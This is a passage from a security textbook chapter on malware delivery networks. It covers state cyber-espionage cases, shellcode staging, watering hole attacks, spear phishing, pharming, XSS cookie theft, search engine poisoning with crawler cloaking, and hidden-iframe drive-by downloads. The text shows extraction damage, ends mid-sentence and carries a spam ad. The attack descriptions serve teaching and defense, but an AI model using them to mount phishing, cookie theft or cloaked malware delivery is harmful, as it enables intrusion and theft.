Malware Delivery Networks

Malware Delivery Networks
Dr.MohitBansal Profile Pic
Published Date:26-10-2017
Your Website URL(Optional)
Malware and Malware Delivery Networks  Firewalls have evolved over the years and have been effective in defending against threats that attempt to infiltrate through the open service ports from outside of a protected infrastructure. The ubiquitous presence of Network Address Translator (NAT) at the ingress points makes it nearly impossible to obtain any meaningful results when host scanning from outside the perimeters of an organization. Although distributed denial of service (DDoS) attacks are still as prevalent today as they were a decade ago, modern variations of traditional brute-force attacks against an infrastructure bring temporary network outages that can be remediated quickly. The existing defensive solutions also can be fortie fi d to recognize these attacks easily, thus becoming capable of fending off similar assaults in the future. More importantly, these attacks inflict limited negative economic impacts on an organization. Contemporary security attacks begin with an internal security breach, which results when an internal user is lured into creating outbound connections and reaching malware delivery networks where all kinds of malicious executable such as keyloggers, Trojans, rootkits, and ransomware are hosted for download. The security compromise is now coming from the inside. Hackers, black hats, threat actors—no matter what we call them, these individuals are intelligent, inven- tive, and capable of creating ingenious exploits. They are motivated by money or driven by political beliefs. Those who are sponsored by governments have inexhaustible resources at their disposal, making them formidable adversaries. 93Instead of focusing on a host‐based solution such as virus identic fi ation, memory forensics, malware executable analysis, and rootkit fundamentals, in this book we choose to focus on subjects that are relevant to key common operations that are carried out by the majority of exploits after a successful infiltration, namely, communication with the command and control (C2) center (or “phone home”) and the exfiltration of valuable data. Cyber Warfare and Targeted Attacks Modern‐day attacks are stealthy and target individuals as well as organiza- tions for maximum economic gain. The Internet, and especially Web 2.0, has facilitated the rapid growth of an illicit shadow economy with hundreds of millions if not billions of dollars in exchange. Modern attacks on organizations have caused tremendous financial damage with far‐reaching impacts beyond the victimized institutions. Classie fi d materials that are crucial to national security have been compromised in cyber‐attacks. Cyber warfare launched against countries can bring devastation that may be described and measured only with war terminology. Espionage and Sabotage in Cyberspace Moonlight Maze was a two‐year‐long cyber espionage operation carried out by a foreign country, suspected to be Russia, against the computer systems within the Pentagon, NASA, the Department of Energy, and various leading U.S. research institutions and universities between 1998 and 2000. Moonlight Maze stole a large volume of information regarding U.S. military installations and military hardware blueprints. Titan Rain was the FBI designation for cyber‐attacks that were uncovered by an employee at Sandia National Laboratories in 2004. The infiltration carried out by attackers targeted highly sensitive computer systems within Lockheed Martin and Sandia National Laboratories, along with possible targets such as NASA and other defense contractors. It was estimated to have been active for over three years and was believed to be sponsored by the Chinese govern- ment. Titan Rain was one of the most damaging cyber espionage attacks to be undertaken to steal military intelligence and classified data. Titan Rain was based on advanced persistent threats. Advanced persistent threats, or APTs, are sophisticated cyber attacks that are extremely covert in nature and developed by highly skilled personnel who may be subject experts with a full spectrum of intelligence‐gathering and cyber penetration tools at their disposal. An APT avoids detection by siphoning the data gradually over an extended period of time. APTs are discussed further in Chapter 8. Chapter 4 ■ Malware and Malware Delivery Networks  95 Three years after Titan Rain, a second major cyber assault on an indepen- dent country became part of cyber warfare history. The cyberspace incursion into Estonia by attackers was allegedly funded and managed by the Russian government, which paralyzed the Estonian information infrastructures that covered government ministries, financial sectors, and media publications and broadcasters. No sabotage campaign in the cyber war theater has played out as signic fi antly as the Stuxnet attack on the Iranian nuclear fusion plant at Natanz. Stuxnet malware was discovered in 2010 and was purportedly jointly developed by the United States National Security Agency (NSA), the CIA, and the Israeli intel- ligence service to sabotage and prevent the progress of the Iranian nuclear fuel enrichment program. The development of Stuxnet spanned two U.S. presidential administrations. Stuxnet was designed to reprogram the programmable logic controllers (PLCs) that are common components in industrial control systems. In fact, Stuxnet contained the first known PLC rootkit to date. Stuxnet is comprised of zero‐day exploits and a Windows rootkit, as well as techniques for evading behavior‐based analysis by antivirus engines and for performing advanced process injection. It can propagate through a network or through removable drives. A zero‐day exploit is an attack on a new vulnerability that is known only to the attacker. Stuxnet breaks the centrifuge by altering the motor speed in a meticulous fashion to avoid detection: it increases the centrifuge speed for 15 minutes, then resumes normal operation, hibernates for 27 days, then lowers the centrifuge speed for 50 minutes before returning control; it then repeats this sequence after hibernating for another 27 days. During each attack sequence, the Stuxnet malware disables the relevant warning and safety controls so as to prevent the system from alerting the operators during the speed change. Stuxnet damaged approximately 1,000 IR‐1 type centrifuges representing roughly 10 percent of the installation during the plant’s peak operation. Stuxnet demonstrated that industrial sabotage can cause critical infrastructure failure, resulting in national emergencies. Stuxnet offered strong evidence that its creators had full access to the relevant industrial control systems and the centrifuge in order to develop and qualify the code. Only a state‐sponsored organization could have facilitated such an operation. In 2012, Flame, also known as Skywiper, was uncovered by multiple organiza- tions and was reported as the most sophisticated malware ever encountered; it was expected to take years to unravel. Similar to Stuxnet, Flame appeared to be another joint effort between the United States and Israel that was five years in the making and served as a cyber espionage weapon to gather and exfiltrate intelligence from multiple targets inside Iran. In 2013, Operation Hangover was exposed as a series of attacks that originated from India and that scoured entities in Pakistan to steal information that was of importance to India’s national interests. Operation Hangover is another example 96 Chapter 4 ■ Malware and Malware Delivery Networks  of APT attacks, and although it ultimately failed in achieving its objectives, it was in operation for over two years before being exposed to the public. These momentous state‐sponsored cyber‐attack events have forever changed and solidie fi d the signic fi ance of cyberspace to the status of the “fifth domain” of war, as a new addition to the domains of land, sea, air, and space. The concept of cyber warfare has been transformed from abstract theorizations into formal- ized doctrines in preparation for actual deployment in military combat theaters. Information systems are treated as military assets that must be defended against enemy attacks, utilized to gather foreign intelligence, and deployed in offensive attacks against adversaries. Weaponized malware is now part of the offensive capabilities in military arsenals because cyber warfare can inflict physical damage on targets that is comparable to conventional weapons. Cyber warfare can be launched against both military and civilian targets. Critical infrastructures such as smart power grids, nuclear power plants, water treatment systems, air trafc m fi anagement and control systems, oil and gas pipelines, food and beverage supply chain management systems, and financial trading systems are all connected online and accessible through the network, making them desirable targets. Sabotaging these critical infrastructures can have detrimental effects, causing economic col- lapse of the financial system and massive loss of life and creating widespread panic and chaos across the country that is under the assaults. Cyber warfare can be launched from thousands of miles away, without a physical presence, and active military e fi ld equipment such as tanks, combat aircraft, and missile systems are all subjected to interference and destruction. Industrial Espionage A dramatic increase in industrial espionage is evident in many targeted attacks in recent years, with examples illuminating the fact that impenetrable security is nonexistent and insidious APTs constitute a grievous threat to any organi- zation. A targeted attack implies there is a specic fi target that possesses data that is desired by the attackers, who will persist in their attacks until they have acquired the objective. Therefore, such a potential target must concentrate on continuous attack detection and eradication solutions to fend off APTs and incorporate a mentality that the attack is constant and may have been success- ful, instead of focusing on just attack prevention. Operation Aurora In January 2010, Google publicly disclosed that its operation in China,, was subjected to an APT attack. Operation Aurora was a targeted attack on Google China that was carried out by an organization called Elderwood Group, based in Beijing. It was largely believed the attack began when targeted Google employees received an e‐mail or an instant message that was forged to appear Chapter 4 ■ Malware and Malware Delivery Networks  97 as if it came from a trusted source. In one case, the e‐mail contained a link. The link led the employee to a website in Taiwan, and this website hosted malicious JavaScript. The employee’s Windows Internet Explorer browser then automatically downloaded this JavaScript, which ran and exploited the zero‐day vulnerability in the browser. Once the JavaScript executed, it downloaded another malicious payload that was disguised as an image file; this payload then created a back - door and connected the malware to its C2 server. At this point the attackers had gained full access to Google’s internal systems. In another case, the e‐mail came with a malicious PDF file attachment that exploited a vulnerability in the Adobe Reader program. Once opened, the embedded malware inside the PDF file allowed the attacker to remotely control the system for further penetration. Regardless of the infiltration method, the malware went after source code repositories and tried to access Google e‐mail accounts of Chinese political activists. More than 30 high‐profile technology and defense companies were targets of the same espionage campaign. State sponsorship was evident in the sophisticated nature of the malware and the orchestrated manner of the attacks. One disturbing fact about Operation Aurora is that, until Google discovered the attack in December 2009, many, if not all, of the victimized corporations were completely unaware of the fact they were being infiltrated and that their cond fi ential intellectual properties were being exfiltrated by the attackers. Microsoft had known about this zero‐day vulnerability that allowed the attackers to perform remote code execution since September 2009. The patch to fix that Internet Explorer browser bug was scheduled for release in February 2010. Adobe had known about its vulnerability in December 2009, and the bug was not fixed until January 2010, after the Google disclosure. All users of these software programs were exposed to potential attacks while the vendors were working on the fix. In the meantime, the black hats were hard at work trying to maximize exploitation of these vulnerabilities. A crucial question for the security industry to address is what the general public can do to protect itself or to alleviate the threats during the vulnerable time before a solution becomes available. Since the attackers gained access to the source code repositories, Operation Aurora unveiled a frightening new threat: after stealing the source code, the attackers could have modie fi d the source code by implementing a new exploit or backdoor to be leveraged in the future against the entire user base of the product built from that source code tree. The code modic fi ation could be com - mitted into the original source tree either by masquerading as a legitimate user or by exploiting software bugs that may be present in the underlying source code control systems. The stolen source code will surely be subjected to elaborate vulnerability analysis for creating future exploits. In Operation Aurora, the multi‐layer security defense failed: the victims’ anti‐ spam defenses failed to catch the malicious e‐mails; their web filtering solution permitted users to connect to the websites that were hosting the exploits; their 98 Chapter 4 ■ Malware and Malware Delivery Networks  antivirus engines did not detect the malware download, possibly due to the zero‐day nature of the exploits; their IDS and IPS systems failed to recognize any abnormal patterns during the intrusion; and their DLP systems did not block any data exfiltration. Watering Hole Attack We have witnessed in the animal kingdom the dramatic scene of a preda- tor chasing down its prey, twirling with high velocity, and pursuing it with immense concentration while the prey foils the hunter with its mighty sprints. The intensity of the prey’s struggle to survive is unimaginable, with death only a few feet away. Sometimes the prey escapes and the hunter limps away, salivating in discouragement. Then there is another hunting approach often seen in the Serengeti, where the predator lurks by a watering hole, patiently waiting for its prey to approach the precious pond, and while it drinks avariciously, the predator dashes forward for a surprise ambush. In cyberspace, attacking individual users requires the black hats to penetrate the first layer of defense, namely, a fortie fi d firewall, which can be detected quickly. The watering hole attack is a type of targeted attack that, instead of focusing on an individual, is aimed at a specic g fi roup based on the group’s interests and behavior. In August 2014, a watering hole malware campaign was launched on the website of a software company that produces simulation and systems engineering software for various industries. The website was known to be frequented by engineers who worked in the automotive, aerospace, and manufacturing industries. The attackers planted a Microsoft Internet Explorer zero‐day exploit into the compromised website. This exploit leveraged out‐of‐ bounds memory vulnerability to perform remote code injection and execution of multi‐stage shellcode through the visitor’s Internet Explorer browser. The exploit performed reconnaissance operations: it probed for various pieces of information on the visitor, logged the visitor’s key strokes, and encrypted and then transmitted the collected data to its C2 server. This exploit is unique in that it performs code injection without committing a copy of itself to disk. This behavior may be an indication that the attackers have high cond fi ence in the exploit to infect the visitors on each of their visits. We can only speculate that the intention of the attackers is to harvest potential visitor information, correlate the user behavior according to what they entered, and then subsequently launch targeted attacks against the visitor or the visitor’s employer to gain industrial secrets. Malware exploits typically consist of two components: the decryption module and the encrypted code payload, as illustrated in Figure 4-1. Shellcode is a small piece of code that is the payload delivered by an exploit. The decryption mod- ule runs first to transform the payload into the shellcode by either decryption Chapter 4 ■ Malware and Malware Delivery Networks  99 or some type of de‐obfuscation algorithm (➁). The control is then transferred to the newly formed shellcode where the execution resumes (➂). The shellcode begins its subversion operations by spawning a system command interpreter, commonly known as a command shell (thus the reason for its name); then from within this command shell, it performs code injection and execution to methodically take control and commandeer the system. The shellcode is written as machine‐independent code, meaning the shellcode can be loaded into any memory location for execution. After exploit transfers control 1 and executes Decryption/De-Obfuscation Code Decrypts 2 Encrypted/Obfuscated Code as Payload First-Stage Shellcode Decrypted/De-obfuscated Shellcode 3 Control transfers to the second stage shellcode and executes Second-Stage Shellcode Figure 4-1: Shellcode Code injection refers to the mechanism by which malicious software inserts code fragments into memory and then implants control transfer logic to inter- cept and manipulate the execution flow. Figure 4-2 depicts the concept of a watering hole attack. As shown in Figure 4-2, when a user visits a compromised website (①), the watering hole exploit remotely injects a code payload directly into the Internet Explorer browser’s running process in memory (➁). From there, the first‐stage shellcode then launches a standard Windows process, called rundll32, which is responsible for loading Windows dynamic link libraries (DLLs) and placing the functions (additional code) implemented by the DLLs into memory ( ). After ➂ launching rundll32, the first‐stage shellcode injects the second‐stage shellcode into the rundll32 process ( ) and then transfers execution control to it ( ). At ➃ ➄ this point the exploit essentially has fully compromised the system.100 Chapter 4 ■ Malware and Malware Delivery Networks  Breached Website Planted zero-day Internet Explorer exploit Visits the Remote code injection 1 2 website through zero-day exploit Visitor’s System Running Internet Launches Rundll32 Process Explorer Process 3 Injects second-stage shellcode into Rundll32 First-Stage Second-Stage Shellcode Shellcode 4 Transfers to nal stage and runs 5 Figure 4-2: Watering Hole Attack Breaching the Trusted Third Party In February 2013, Bit9 was breached by hackers, and one of its digital code‐ signing certic fi ates was stolen. Bit9 is best known for its whitelisting solution that certie fi s known safe applications. Its agent software intercepts and blocks any application that is not in the approved whitelist. Attackers used Bit9’s sign- ing certic fi ate to sign malicious applications that subsequently circumvented Bit9‐based defensive solutions. Bit9’s customers discovered that malware and notie fi d Bit9 because the certic fi ate pointed to Bit9 as its owner. The irony was that Bit9 advocated its solution as the industry leader to offer non‐traditional security solutions to enterprises, yet part of Bit9’s network was not protected by its own solutions. Instead of launching direct assaults on the Bit9 security solu- tion, the attackers made a strategic decision to breach the source of the solution, effectively neutralizing the defense system by falsifying the attacks as benign using the legitimate credentials of the system creator. Chapter 4 ■ Malware and Malware Delivery Networks  101 There are known cases where certic fi ates that were issued to hardware manu - facturers have been stolen because these manufacturers produced not only the hardware components and modules but also the companion drivers to run in popular operating systems such as Microsoft Windows. These drivers must be digitally signed by valid certic fi ates before the driver binaries can be certie fi d to run within the Windows kernel at privileged execution levels. Stealing code‐ signing certic fi ates and then signing malicious code pretending to be system drivers can easily gain user and system acceptance. The Korean gaming industry, especially the massive multiplayer online games, has had numerous breach incidents in the past few years. In each publicized case, malware bearing valid game publishers’ digital signatures was installed through the game update process and infected millions of online players. The various malware have stolen subscribers’ account information, seized in‐game assets, installed in‐game cheats, or pirated game source code. Casting the Lures So how is a user led to download a piece of malware and fall victim to its creator? It all begins with a wide variety of lures as colorful as the human imagination, with the majority rooted in social engineering to entice a potential victim. In the majority of attacks, the bait was conveyed through e‐mail. Social networks continue to be an effective attack vector. Although we like to avoid making general statements, incidents have proven time and again that most people on social networks tend to be less knowledgeable about computer security. A lot of them are relative newbies when it comes to Internet safe use practices. This population is always connected to the Internet through their smart mobile devices on fast 4G and LTE networks. They have become more impatient due to constant distractions coming from various mobile applications: Twitter, Snapchat, Skype, and text messages. They are constantly multitasking, participating in simultaneous online conversations, and they are much more willing to talk with strangers online. This changing user behavior subjects them to greater exposure to cyber threats and makes them easy prey to online scams and perpetrators. The explosive growth of the user base that is energized by visual stimulants and always seeking out instant gratic fi ation propels social networking service providers to deliver more and more cool and easy‐to‐use features. Security becomes an afterthought, often left out of the application design, and is per- ceived as a hindrance to maintaining higher growth. The continuous addition of features to the infrastructure of social networks means that the code remains in a state of u fl x and security analysis is always incomplete. The interminable relationships developed among millions of users within these social networks serve as rapid infection paths with a broad reach.102 Chapter 4 ■ Malware and Malware Delivery Networks  Spear Phishing Spear phishing is a black hat e‐mail scam technique that—unlike regular phish- ing, which spams indiscriminately to all potential victims—targets specic fi individuals or organizations. With a spear phishing campaign against a well‐ known organization, the black hat first conducts a background investigation of the targeted organization and then forges a spear phishing e‐mail directed at specic i fi ndividuals in that organization. The e‐mail header masquerades as if it were originating from someone within that company. The e‐mail content contains information pertaining to a specic e fi vent that is taking place at the company or discusses a subject that is familiar to the potential victim. For example, the e‐mail may purport to seek help from the victim in review- ing a customer document, and the hyperlink to the document actually points to an exploit that is hosted on a malicious website. Or the e‐mail may come with a malicious executable disguised as a PDF file attachment. In either case, once the victim takes the bait and executes the exploit that is obtained either directly or through a drive‐by download, the exploit compromises the victim’s system and takes a foothold in that corporation’s network. The effectiveness of spear phishing credits its success to the deceptive social engineering tactic that breaks down the victim’s suspicions because the e‐mail came from a credible source, so the anecdotal warning “don’t take candy from a stranger” need not apply. Pharming Pharming refers to an attack that leads visitors away from a legitimate website and redirects them to a forged site. The fake site is under black hat control and resembles the original legitimate site in almost every way to deceive the visi- tor. This forgery, when done successfully, persuades the visitor to think he has reached the right site (for example, a banking site), thus inducing the visitor to enter his user credentials to sign in to his account. After acquiring the user credentials, a typical action performed by the pharming code is to forward these credentials onward to the real site, essentially acting as a proxy without the user taking notice. The web browser must issue a DNS query to resolve the site’s IP address before making the connection. As such, one type of pharming attack can be accomplished by exploiting DNS vulnerabilities so that the IP address returned from the DNS query is replaced by one that points to the fake site. Examples of DNS vulnerability exploitation include DNS hijacking, domain hijacking, DNS cache poisoning, and DNS spoon fi g . There are different methods of DNS hijacking. In one method the system con- g fi uration is manipulated by malicious code that changes the DNS server to a rogue DNS server under black hat control. The rogue DNS server always returns IP addresses that connect to websites that masquerade as the respective legitimate ones. Similarly the malicious code can change the local DNS cong fi uration file, typically called the host file, which directly maps a DNS name to an IP address. Chapter 4 ■ Malware and Malware Delivery Networks  103 Domain hijacking occurs when the owner of an established domain is changed to a different registrant without the knowledge of the original owner. Because a registered domain name has an expiration date, this change can occur due to a lapse in renewal by the original owner, resulting in the domain name being purchased by someone else. Another tactic is through impersonation, possibly by means of identity theft and deploying social engineering to modify the domain ownership. Related to domain hijacking, there is an attack vector where the black hat registers multiple domain names, with each being one possible misspelling of the targeted domain name. A visitor is redirected to a fake site when they misspell the domain name to one that has a valid registration having the black hat as the owner. In DNS cache poisoning, a compromised system inside a managed network is induced by the attacker to query a domain name that is under the attacker’s control. The attacker’s domain name is resolved by a rogue DNS server that acts as the authoritative name server for that domain name. When the rogue DNS server returns the query result, it includes response entries for the domains the attacker wants to hijack. Obviously, the IP addresses associated with these legitimate domain names link to forged websites. Once the DNS server that resides in the managed network receives these DNS responses, it will cache these entries. Future DNS responses that contain valid entries for those legitimate domain names will not be accepted until the cached fake entries have expired. Similar to DNS cache poisoning, in a DNS spoon fi g attack, the attacker leverages a compromised system to transmit specially crafted DNS responses for domain names to be hijacked. The goal is to insert a response into the DNS server cache with a fake entry so that the valid entry can be rejected. An attacker can launch a pharming attack through a phishing e‐mail. For example, the attacker can craft and forge an e‐mail that appears to come from a well‐known bank, asking the recipient to log into the banking site to validate their address information. If the recipient is an unsuspecting user who promptly clicks the link embedded in the e‐mail, that user is led to a landing page that appears to be exactly the same as the banking site, but underneath it is a fake site whose only purpose is to harvest user credentials. Cross‐Site Scripting Spear phishing is an essential component of a cross‐site scripting (XSS) attack. An XSS attack is the exploitation of a type of vulnerability that has been discov- ered in web‐based applications. This vulnerability enables an attacker to inject scripts that will execute on the client side to hijack an active client session using stolen session credentials. The XSS attack circumvents the basic same‐origin web application security policy. The same‐origin policy restricts the browser such that the browser disallows the content that was received from one website to read or write content that was received from a different site. There are various types of XSS attacks: ree fl cted (or non‐persistent) attacks, persistent (or stored) attacks, and Document Object Model (DOM) vulnerability‐based attacks.Probes and discovers XSS vulnerabilities in CRM 104 Chapter 4 ■ Malware and Malware Delivery Networks  A ree fl cted XSS attack describes the scenario where a web‐based application extracts and includes a portion of the client’s input verbatim in its response to the client. The goal of the attacker is to steal the session token, which may be in the form of a browser cookie, and hijack that client session. The session cookie is issued by the web application server; therefore, any dynamic JavaScript code that wants to retrieve the session cookie must come from that same web server. So the attacker attempts to explore the XSS vulnerability to own the session cookie. The assumption is that the attacker has deep knowledge of the web application under attack. It is a common practice for the black hat to first map out as much of the web application as possible and then to probe each operation within the application to expose one or more vulnerabilities. The prerequisite for a suc- cessful attack is that the attacker has discovered an application behavior, called an XSS vulnerability, where an operation is known to take a portion of the user input and include that input unmodie fi d in the result of that operation. This discovery enables the attacker to create special input that targets the known XSS vulnerability. This attack scenario is depicted in Figure 4-3. Spear Phishing E-mail 3 7 Sends session Black Hat cookie to attacker 8 Crafted CRM Request with Embedded JavaScript 1 Connected and signed on 2 Browser User 4 CRM Web Application 6 5 CRM app responds JavaScript executes with the same in browser and retrieves embedded JavaScript the session cookie Figure 4-3: Cross‐Site Scripting Attack Takes bait and sends request Attacker hijacks the user session Chapter 4 ■ Malware and Malware Delivery Networks  105 In this example, a black hat has discovered vulnerabilities in a customer relationship management (CRM) application, which may be exploited to launch XSS attacks against its users (①). Now a user has established a connection to this CRM application, and the user has successfully logged into his or her account (➁). For example, the user may be a salesperson who needs to be logged into the CRM throughout the entire workday. So the attacker meticulously crafts a request targeting that CRM system and embeds in that application request a piece of obfuscated JavaScript code. The function to be performed by the JavaScript code is to retrieve the session cookie and send it to a designated web location. Then the attacker leverages spear phishing to send the user a spear phishing e‐mail, with a subject title “please help validate customer contact info” (➂). The attacker forges an HTML e‐mail to appear as if it were sent from the user’s supervisor. In this bogus e‐mail is the customized request in hyperlink form with a link title that reads “Customer Bob’s contact information”. The user takes the bait and clicks the hyperlink, which sends the specially crafted request to the web application (➃). The CRM system returns that exact JavaScript back to the user due to the XSS vulnerability (➄). This time the user’s browser executes the JavaScript (➅) and transmits the session cookie to the attacker (➆). Now the attacker can easily hijack and take over the user session (➇). The web has evolved from a repository of static content to an exciting, inter- active web where participants of the so‐called Web 2.0 can browse static web pages as well as publish dynamic content. For example, anyone can visit a social forum where he or she can view ongoing discussions in real‐time. In many cases the forum allows both subscribers and anonymous visitors to contribute to that discussion by posting their comments and opinions. This interactive forum facilitates a persistent or stored XSS attack. With a stored XSS attack, an attacker can post content with crafted JavaScript that will execute in the browser of whoever is reading that posting. Similar to a ree fl cted XSS attack, the malicious code executes in the visitor’s browser and sends the visitor’s session cookie to the attacker. If the visitor is in fact a registered forum member, then this stored XSS attack will help the attack to eventually compromise that user’s account. A stored XSS attack is more damaging than a reflected XSS attack. A ree fl cted XSS attack targets a single victim, but a stored XSS attack targets anyone who can view the maliciously crafted content. In a ree fl cted XSS attack, when the attacker sends a spear phishing e‐mail or any other kind of lure to the user, the user must have a session that is active with the web application in question when the user clicks the crafted request. In comparison, in a stored XSS attack, the user who is viewing a crafted posting will be doing so in an active session already, thereby eliminating the timing issue that is a prerequisite to a reflected XSS attack. In addition to stored and reflected attacks, a third XSS attack method is called a DOM‐based XSS attack. The DOM‐based XSS vulnerability is a side 106 Chapter 4 ■ Malware and Malware Delivery Networks  effect of a website that attempts to improve the user experience by custom- izing content according to a given visitor. For a given web page constructed in HTML or XML format, there exists a DOM that describes the structures of that page and how that page is accessed and manipulated from the browser’s perspective. When the browser renders the page, a DOM object such as the document.URL object may be fed a URL that contains an embedded and obfus- cated malicious script that exploits the vulnerability similar to a reflected XSS attack. Search Engine Poisoning One method of luring potential victims to malware delivery servers is by search engine poisoning (SEP). The main goal of SEP is for the black hats to inject links that point to their malicious servers in the top search results for any popular search engine. Links that are part of the top search results have the highest potential of being clicked by the user who issued the search. Therefore, the more poisoned links in the search results, the better chance for the black hats to victimize users. This is why the process of deceiving a search engine to return malicious links in its search results is called search engine poisoning. Black hats execute a series of steps to poison search engines. First, the black hat creates bait pages that contain popular search keywords and phrases. These keywords and phrases are repeated in a bait page but interleaved with random words, phrases, and sentences, and combined with random images to make the page appear more legitimate to a web bot or crawler. Then the black hat launches mass e‐mail spam to advertise links to these bait pages. He also posts those links to various social forums and compromised websites and distributes those links through online advertising networks or ad networks. Link farms are also set up to broaden the reach. A link farm is a coterie of websites where each website cross-references every other site within the group through hyperlinks. A site may build a directory of web pages that serve as links. A link farm is another black hat venue for search engine optimization (SEO) that increases the relevancy of a website rating by a search engine algorithm that assigns weights or values to the hyperlinks. The goal of the bait page is to lead potential victims to the malware delivery server. How is the malware delivered if and when the victim reaches the harm- less bait page? The victim actually never sees the bait page. The trick is in how the malware server processes each HTTP request and what content is returned to fulfill the request. First, the malware server needs to know where the request is coming from, that is, who or what entity is issuing the request, before decid- ing which content should be returned. The User‐Agent field in the HTTP request header discloses whether the entity is a search engine crawler or a web browser, as shown in Figure 4-4. Chapter 4 ■ Malware and Malware Delivery Networks  107 Google Search User 1 Searches for “where can I get best iPad deals” 2 Figure 4-4: User‐Agent and Referrer For example, the Google web‐crawling bot named Googlebot is identie fi d by the following User‐Agent string: User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; + In this example, a regular user running a Firefox browser on the Mac OS X operating system has the following User‐Agent signature: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10 Besides computing the relevance of a web page, the modern search engine indexer has built‐in detection algorithms to identify potential malware scripts High Relevance 108 Chapter 4 ■ Malware and Malware Delivery Networks  contained within a page and assesses the risk level of the overall page content. The search engine market is competitive, and a search engine can lose its market share quickly if users are frequently led to junk or malicious pages. Therefore, it is good business practice to safeguard users by preemptively filtering harmful results and presenting them with safe links. The exploit server is built to respond intelligently according to who is making the request, as illustrated in Figure 4-5. Google Search Googlebot User 2 Searches for “best iPad deals” Forums 3 Popular Top Search Results Websites Blogs Link Farms (News, Social Finance, etc.) Networking Exploit Server 4 Referer: Search Results, Referer: Ad Networks, 1 5 Search Bot Websites Repeating keywords and phrases with random text and images Direct Connection Fake: - 404 Not Found - Blank White Hat - Under Construction Figure 4-5: Search Engine Poisoning As shown in Figure 4-5, when a malware server detects a search engine crawler is paying it a visit, the server presents a carefully constructed, innocuous bait page to the search engine bot to index ( ). When the malware server detects ① that an HTTP request was directly entered into a browser to reach the malware malware.js http://suspicious site Chapter 4 ■ Malware and Malware Delivery Networks  109 site, the malware server presents a snooper page in return. The snooper page typically shows the site is under construction or the site is completely blank, thus offering no content to the visitor. The snooper page is a lame strategy put in place to keep a low profile and turn white hats away from examining the site. Sometimes the malware server simply redirects a prying visitor to a well‐known site. Now, as soon as the malware server detects that the request originates from a search engine results page (➁, ➂, ➃), this is when it returns the actual intended malicious content because it knows a user has taken the bait and clicked a poisoned link (➄). The Referrer field in the HTTP request header contains evidence of the search engine results. Figure 4-4 illustrates an example where the user has entered “where can I get best iPad deals” in the Google search engine. When the user selects the top search result and follows the link, the Referrer field shows In addition, the words from the search phrase entered by the user are shown as a URL parameter, which is leveraged by the black hats to enhance the available keywords and phrases contained in the bait pages, thus improving the potency of those bait pages in poisoning the search engine. The mainstream media has created a myth about SEP being a significant threat vector during newsworthy events. Research into the data that has been generated by Blue Coat’s 75 million WebPulse users indicated a disparity between the compiled results and the press reports. In past significant events, between the years 2008 and 2013, which include natural disasters, sports finals, financial market meltdowns, deaths of celebrities, and so on, less than 0.01 percent of malicious links were activated due to SEP. This surprising find may be attributed to the following factors: ■ Significant events are covered by all news organizations, which causes a search engine “clutter” effect. In other words, there is so much relevant and clean content (articles, commentaries, blogs) that is distributed across a large number of legitimate websites—reputable news media sites such as CNN, NPR, and BBC—that it causes the search engine to produce real content as top search results. ■ People are now drawn to social networking sites such as Facebook and Twitter to obtain their information. Therefore, the attack vectors are chiefly phish - ing e‐mails and malicious postings on well‐known online social media sites. ■ Search engines continue to improve their detection algorithms to sanitize search results. Drive‐by Downloads and the Invisible Iframe As a result of SEP, drive‐by downloads are a scheme that black hats employ to induce the download of malicious code from a crafted attack page, when a user visits a compromised or purposely built malicious website. The goal of 110 Chapter 4 ■ Malware and Malware Delivery Networks  a drive‐by download is to inject malicious code into the user’s system. In one approach, the black hats use social engineering to lure a user to consent and accept an offer and then manually download and run the malicious code that is behind the offer. A common bait to entice a user is through various offerings of digital material relating to A‐list celebrities, such as a leaked nude video that requires the user to download and install a “missing” video codec or to upgrade an existing version of a player program in order to view the movie. Figure 4-6 shows a fake Adobe Flash Player upgrade scheme that we downloaded. Figure 4-6: Fake Video Player Update First of all, you may notice the displayed warning message is really just a web page that tries to simulate an Adobe update pop‐up window. This should have raised an alarm. Second, there is the URL, “2‐”, which means this website is not affiliated with Adobe. Below the big yellow Accept and Install but - ton, the text in small print reads, “Clicking any download button on this website will begin installation of InstallIQ, which manages installation of the products available on this website.” In other words, this is a fake warning message, and the executable has nothing to do with the Adobe Flash program. Clicking the Install button means the user agrees to install an unknown program that is published by an unknown software company that calls itself “InstallX, LLC” but it names its software “adobea fl shplayer.exe”. In this example, after completing Chapter 4 ■ Malware and Malware Delivery Networks  111 the download step, we uploaded the binary onto VirusTotal; it scored 24 out of 54 hits as Trojan adware. Another common ploy is to instigate fear in the user to act without hesita- tion, for example, displaying an animation that falsie fi s evidence of malicious activities that appear to already exist in the user’s system. The user is urged to download and install antivirus software immediately to remove the virus and sterilize the system. Obviously the real malware is packaged as the fake antivirus software, and once installed, it causes serious havoc in the user’s system. Figure 4-7 shows fake antivirus scan results that prompt a user to act immediately to clean up their system. Figure 4-7: Fake Antivirus Scanning This malicious web page used an animated image ploy that pretends to perform a virus scan on the visitor’s system. In this case, we were actually running on a Unix system, not on Microsoft Windows. The fake “Windows Security Alert” pop‐up prompts the user to click the Remove All button, but clicking anywhere on the web page will trigger a download and the installation of a Trojan virus. Social engineering may be one attack vector, but another tactic is more danger- ous and completely evades the user through an insidious automatic background download and execution of malicious code to infect the user’s system. In other words, the download process does not require user interaction at all. When a 112 Chapter 4 ■ Malware and Malware Delivery Networks  user visits a compromised website, the user’s browser is redirected to an attack page, possibly through multiple layers of dee fl ction using techniques such as HTTP redirection, an invisible iframe, or JavaScript execution within a browser. Figure 4-8 illustrates a common iframe‐based drive‐by download scheme. Web Browser Well-Known Website User HTTP GET Request 1 2 Returned Web Page Advertising Banner 3 Browser loads page, Hidden Iframe renders content Hidden frame triggers another download 4 Malicious 5 JavaScript Malicious JavaScript Exploit Newly Compromized Host Compromized Host executes Figure 4-8: Invisible Iframe In this example, the user visits a well‐known but compromised website (①), and the page displayed to the user has an ad banner. Inside this ad banner is an invisible iframe; it is invisible because, as shown in the figure, it has 0 dimensions and the hidden display style (➁). The source of the iframe points to a piece of JavaScript “js.js” that is hosted on a malicious site in Russia (➂). The browser automatically downloads js.js when processing the embedded iframe directive

Advise: Why You Wasting Money in Costly SEO Tools, Use World's Best Free SEO Tool Ubersuggest.